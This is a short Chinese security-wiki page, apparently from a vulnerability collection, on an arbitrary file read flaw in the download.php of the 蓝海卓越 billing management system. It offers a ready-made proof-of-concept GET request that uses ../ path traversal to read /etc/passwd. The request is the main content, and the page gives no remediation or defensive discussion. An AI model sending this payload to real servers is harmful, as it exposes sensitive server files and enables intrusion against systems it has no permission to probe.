menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right 蓝海卓越计费管理系统 任意文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    蓝海卓越计费管理系统 任意文件读取漏洞.md
    310 B / 2021-05-21 09:14:38
        # 蓝海卓越计费管理系统 任意文件读取漏洞


蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件.

poc:

```
GET /download.php?file=../../../../../etc/passwd HTTP/1.1
Host: 
```

via:peiqi
    links
    file_download